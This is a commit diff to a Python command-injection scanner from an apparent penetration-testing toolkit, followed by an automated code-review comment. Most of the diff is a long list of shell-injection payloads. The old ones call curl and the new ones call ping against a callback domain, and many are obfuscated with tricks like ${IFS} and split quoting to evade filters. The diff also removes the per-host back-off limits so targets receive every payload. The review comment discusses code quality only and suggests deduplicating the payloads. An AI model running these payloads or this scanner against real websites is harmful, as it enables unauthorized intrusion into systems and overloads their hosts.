Projects STRLCPY pentest-tools Commits aef8b0ef
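--- a/rce.py
+++ b/rce.py
@@ -18,8 +18,8 @@
 from multiprocessing.dummy import Pool
 from colored import fg, bg, attr
 
-MAX_EXCEPTION = 3
-MAX_VULNERABLE = 3
+MAX_EXCEPTION = 100
+MAX_VULNERABLE = 100
 
 # disable "InsecureRequestWarning: Unverified HTTPS request is being made."
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
@@ -119,8 +119,8 @@
  if len(t_urlparse.query):
  testParams( t_urlparse, payload.strip('/') )
 
- if len(t_urlparse.fragment):
- testFragment( t_urlparse, payload.strip('/') )
+ # if len(t_urlparse.fragment):
+ # testFragment( t_urlparse, payload.strip('/') )
 
  testPath( t_urlparse, payload )
 
@@ -140,7 +140,8 @@
 
 def doTest( url, method='GET', post_params='' ):
 
- t_realdotest.append( [url,method,post_params] )
+ realDoTest( [url,method,post_params] )
+ # t_realdotest.append( [url,method,post_params] )
  return
 
 
@@ -157,19 +158,19 @@
  t_urlparse = urllib.parse.urlparse(url)
  u = t_urlparse.scheme + '_' + t_urlparse.netloc
 
- if not u in t_exceptions:
- t_exceptions[u] = 0
- if t_exceptions[u] >= MAX_EXCEPTION:
- if _verbose >= 3 and _verbose < 4:
- print("skip too many exceptions %s" % t_urlparse.netloc)
- return
+ # if not u in t_exceptions:
+ # t_exceptions[u] = 0
+ # if t_exceptions[u] >= MAX_EXCEPTION:
+ # if _verbose >= 3 and _verbose < 4:
+ # print("skip too many exceptions %s" % t_urlparse.netloc)
+ # return
 
- if not u in t_vulnerable:
- t_vulnerable[u] = 0
- if t_vulnerable[u] >= MAX_VULNERABLE:
- if _verbose >= 3 and _verbose < 4:
- print("skip already vulnerable %s" % t_urlparse.netloc)
- return
+ # if not u in t_vulnerable:
+ # t_vulnerable[u] = 0
+ # if t_vulnerable[u] >= MAX_VULNERABLE:
+ # if _verbose >= 3 and _verbose < 4:
+ # print("skip already vulnerable %s" % t_urlparse.netloc)
+ # return
 
  try:
  if method == 'POST':
@@ -177,7 +178,7 @@
  else:
  r = requests.head( url, headers=t_custom_headers, timeout=5, verify=False )
  except Exception as e:
- t_exceptions[u] = t_exceptions[u] + 1
+ # t_exceptions[u] = t_exceptions[u] + 1
  if _verbose >= 3 and _verbose < 4:
  sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
  return
@@ -321,47 +322,109 @@
 
 if not n_payloads:
  t_payloads = [
- '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__',
- '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__',
- '%0a%20curl%20rce___RANDOM_STR__.__DOMAIN__%20%0a',
- '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__%0A',
- '|curl%20rce___RANDOM_STR__.__DOMAIN__',
- ';curl%20rce___RANDOM_STR__.__DOMAIN__',
- ';curl%20rce___RANDOM_STR__.__DOMAIN__|',
- ';curl%20rce___RANDOM_STR__.__DOMAIN__;',
- ';curl$IFSrce___RANDOM_STR__.__DOMAIN__;',
- ')|curl%20rce___RANDOM_STR__.__DOMAIN__',
- ')|curl%20rce___RANDOM_STR__.__DOMAIN__;',
- ');curl%20rce___RANDOM_STR__.__DOMAIN__',
- ');curl%20rce___RANDOM_STR__.__DOMAIN__|',
- ');curl%20rce___RANDOM_STR__.__DOMAIN__;',
- '`curl%20rce___RANDOM_STR__.__DOMAIN__`',
- '||curl%20rce___RANDOM_STR__.__DOMAIN__|',
- '||curl%20rce___RANDOM_STR__.__DOMAIN__;',
- '||curl$IFSrce___RANDOM_STR__.__DOMAIN__;',
- '|%20curl%20rce___RANDOM_STR__.__DOMAIN__',
- '|curl%20rce___RANDOM_STR__.__DOMAIN__',
- '|curl%20rce___RANDOM_STR__.__DOMAIN__|',
- '|curl%20rce___RANDOM_STR__.__DOMAIN__;',
- ';|curl%20rce___RANDOM_STR__.__DOMAIN__|',
- ';%20curl%20rce___RANDOM_STR__.__DOMAIN__',
- ';curl%20rce___RANDOM_STR__.__DOMAIN__',
- ';curl%20rce___RANDOM_STR__.__DOMAIN__|',
- ';curl%20rce___RANDOM_STR__.__DOMAIN__;',
- '$;curl%20rce___RANDOM_STR__.__DOMAIN__',
- '$(curl%20rce___RANDOM_STR__.__DOMAIN__)',
- '&%20curl%20rce___RANDOM_STR__.__DOMAIN__',
- '%26%20curl%20rce___RANDOM_STR__.__DOMAIN__%20%26',
- ';curl%20rce___RANDOM_STR__.__DOMAIN__\n',
- '\ncurl%20rce___RANDOM_STR__.__DOMAIN__|',
- '\ncurl%20rce___RANDOM_STR__.__DOMAIN__;',
- '|ncurl%20rce___RANDOM_STR__.__DOMAIN__\n',
- '\ncurl%20rce___RANDOM_STR__.__DOMAIN__\n',
- ';system(\'curl%20rce___RANDOM_STR__.__DOMAIN__\')',
- ';exec(\'curl%20rce___RANDOM_STR__.__DOMAIN__\')',
- '|curl%20rce___RANDOM_STR__.__DOMAIN__\n',
- '`curl%20rce___RANDOM_STR__.__DOMAIN__`',
- '%0acurl%20rce___RANDOM_STR__.__DOMAIN__%0a',
+ 'rce___RANDOM_STR__.__DOMAIN__',
+ '$;ping%20rce___RANDOM_STR__.__DOMAIN__',
+ '%0Aping%20rce___RANDOM_STR__.__DOMAIN__%0A',
+ '%0Aping%20rce___RANDOM_STR__.__DOMAIN__',
+ '%0a%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%0a',
+ '%0aping%20rce___RANDOM_STR__.__DOMAIN__%0a',
+ '%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26',
+ '%26%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26%26',
+ '&%20ping%20rce___RANDOM_STR__.__DOMAIN__',
+ ');ping${IFS}rce___RANDOM_STR__.__DOMAIN__',
+ ');ping<rce___RANDOM_STR__.__DOMAIN__',
+ ");p'i'n'g'${IFS}rce___RANDOM_STR__.__DOMAIN__%23",
+ ');p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__%23',
+ ');{p\i\n\g,rce___RANDOM_STR__.__DOMAIN__}%23',
+ ');{ping,rce___RANDOM_STR__.__DOMAIN__}',
+ ');ping%20rce___RANDOM_STR__.__DOMAIN__',
+ ');ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ ');ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ ')|ping%20rce___RANDOM_STR__.__DOMAIN__',
+ ')|ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ ';{ping;rce___RANDOM_STR__.__DOMAIN__}',
+ ';exec(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')',
+ ';ping${IFS}rce___RANDOM_STR__.__DOMAIN__;',
+ ';ping<rce___RANDOM_STR__.__DOMAIN__;',
+ ';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;',
+ ';{ping,rce___RANDOM_STR__.__DOMAIN__};',
+ ';ping%20rce___RANDOM_STR__.__DOMAIN__',
+ ';ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ ";p'i'n'g%20rce___RANDOM_STR__.__DOMAIN__;",
+ ';p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__;',
+ ';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;',
+ ';p$@in$@g%20rce___RANDOM_STR__.__DOMAIN__;',
+ ';p$()in$()g%20rce___RANDOM_STR__.__DOMAIN__;',
+ ';ping%20rce___RANDOM_STR__.__DOMAIN__\n',
+ ';ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ ';system(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')',
+ ';|ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ '\nping%20rce___RANDOM_STR__.__DOMAIN__;',
+ '\nping%20rce___RANDOM_STR__.__DOMAIN__\n',
+ '\nping%20rce___RANDOM_STR__.__DOMAIN__|',
+ '`ping%20rce___RANDOM_STR__.__DOMAIN__`',
+ '|%20ping%20rce___RANDOM_STR__.__DOMAIN__',
+ '|\nping%20rce___RANDOM_STR__.__DOMAIN__\n',
+ '|ping%20rce___RANDOM_STR__.__DOMAIN__',
+ '|ping${IFS}rce___RANDOM_STR__.__DOMAIN__;',
+ '|ping<rce___RANDOM_STR__.__DOMAIN__;',
+ '|{ping,rce___RANDOM_STR__.__DOMAIN__};',
+ '|ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ '|ping%20rce___RANDOM_STR__.__DOMAIN__\n',
+ '|ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ '||ping$IFSrce___RANDOM_STR__.__DOMAIN__;',
+ '||ping<rce___RANDOM_STR__.__DOMAIN__;',
+ '||{ping,rce___RANDOM_STR__.__DOMAIN__};',
+ '||ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ '||ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ "||p'i'n'g%20rce___RANDOM_STR__.__DOMAIN__%23",
+ '||p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__%23',
+ '||p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__%23',
+ '||p$@in$@g%20rce___RANDOM_STR__.__DOMAIN__%23',
+ '||p$()in$()g%20rce___RANDOM_STR__.__DOMAIN__%23',
+ 
+ # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__',
+ # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__',
+ # '%0a%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%0a',
+ # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__%0A',
+ # '|ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # ';ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # ';ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ # ';ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ # ';ping$IFSrce___RANDOM_STR__.__DOMAIN__;',
+ # ')|ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # ')|ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ # ');ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # ');ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ # ');ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ # '`ping%20rce___RANDOM_STR__.__DOMAIN__`',
+ # '||ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ # '||ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ # '||ping$IFSrce___RANDOM_STR__.__DOMAIN__;',
+ # '|%20ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # '|ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # '|ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ # '|ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ # ';|ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ # ';%20ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # ';ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # ';ping%20rce___RANDOM_STR__.__DOMAIN__|',
+ # ';ping%20rce___RANDOM_STR__.__DOMAIN__;',
+ # '$;ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # '$(ping%20rce___RANDOM_STR__.__DOMAIN__)',
+ # '&%20ping%20rce___RANDOM_STR__.__DOMAIN__',
+ # '%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26',
+ # '%26%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26%26',
+ # ';ping%20rce___RANDOM_STR__.__DOMAIN__\n',
+ # '\nping%20rce___RANDOM_STR__.__DOMAIN__|',
+ # '\nping%20rce___RANDOM_STR__.__DOMAIN__;',
+ # '|nping%20rce___RANDOM_STR__.__DOMAIN__\n',
+ # '\nping%20rce___RANDOM_STR__.__DOMAIN__\n',
+ # ';system(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')',
+ # ';exec(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')',
+ # '|ping%20rce___RANDOM_STR__.__DOMAIN__\n',
+ # '`ping%20rce___RANDOM_STR__.__DOMAIN__`',
+ # '%0aping%20rce___RANDOM_STR__.__DOMAIN__%0a',
  ]
 
 for i,payload in enumerate(t_payloads):
@@ -410,7 +473,7 @@
  sys.stdout.write( '[+] testing...\n' )
 
 
-random.shuffle(t_totest)
+# random.shuffle(t_totest)
 # print("\n".join(t_totest))
 # exit()
 
@@ -448,35 +511,35 @@
 
 
 
-t_exceptions = {}
-t_vulnerable = {}
-t_multiproc = {
- 'n_current': 0,
- 'n_total': len(t_realdotest),
- 'u_max_length': u_max_length+5,
- 'd_output': d_output,
- 'f_output': f_output,
-}
+# t_exceptions = {}
+# t_vulnerable = {}
+# t_multiproc = {
+# 'n_current': 0,
+# 'n_total': len(t_realdotest),
+# 'u_max_length': u_max_length+5,
+# 'd_output': d_output,
+# 'f_output': f_output,
+# }
 
-def realDoWork():
- while True:
- params = q.get()
- realDoTest( params )
- q.task_done()
+# def realDoWork():
+# while True:
+# params = q.get()
+# realDoTest( params )
+# q.task_done()
 
-q = Queue( _threads*2 )
+# q = Queue( _threads*2 )
 
-for i in range(_threads):
- t = Thread( target=realDoWork )
- t.daemon = True
- t.start()
+# for i in range(_threads):
+# t = Thread( target=realDoWork )
+# t.daemon = True
+# t.start()
 
-try:
- for url in t_realdotest:
- q.put( url )
- q.join()
-except KeyboardInterrupt:
- sys.exit(1)
+# try:
+# for url in t_realdotest:
+# q.put( url )
+# q.join()
+# except KeyboardInterrupt:
+# sys.exit(1)
 
 
 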
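Review bot: Commenting out the `t_exceptions` and `t_vulnerable` guards in realDoTest (old lines 160–172 and 180) removes the scanner's only per-host back-off, so an unreachable host is now retried with a 5 s timeout for every remaining payload and a host that already triggered a hit keeps receiving the full list. Since nothing reads them any more, the bump to `MAX_EXCEPTION = 100` / `MAX_VULNERABLE = 100` in the first hunk is dead code — either keep the guards and raise the constants, or remove the constants together with the commented blocks (realDoTest's body continues outside the hunk). The commented-out tail of the file (old lines 451–479) also no longer defines `t_multiproc`; if realDoTest still reads it for progress or output paths, the first call will raise NameError, which is worth confirming since that code is not in the diff. Commented-out code should be deleted rather than kept, since the history already preserves it, and the now-synchronous `doTest` → `realDoTest` path presumably leaves the `_threads` option without effect — a note on the option would avoid surprising users. The new payload list also contains duplicates (the `';p\i\n\g%20…;'` entry appears twice), so each target receives identical requests; `t_payloads = list(dict.fromkeys(t_payloads))` after the literal would dedupe it while keeping order.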